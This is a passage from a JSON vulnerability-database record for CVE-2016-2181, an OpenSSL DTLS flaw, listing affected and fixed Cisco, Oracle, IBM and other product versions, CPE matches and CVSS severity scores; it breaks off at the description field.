interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud web security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "13" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "oss support tools", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "project openssl", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": "1.1" }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.3.1" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.5" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.11" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.23" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.3-6513" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "unity express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" } ], "sources": [ { "db": "BID", "id": "92982" }, { "db": "JVNDB", "id": "JVNDB-2016-004779" }, { "db": "NVD", "id": "CVE-2016-2181" }, { "db": "CNNVD", "id": "CNNVD-201609-102" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2181" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201609-102" } ], "trust": 0.6 }, "cve": "CVE-2016-2181", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2181", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2181", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2181", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201609-102", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-2181", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2181" }, { "db": "JVNDB", "id": "JVNDB-2016-004779" }, { "db": "NVD", "id": "CVE-2016-2181" }, { "db": "CNNVD", "id": "CNNVD-201609-102" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": 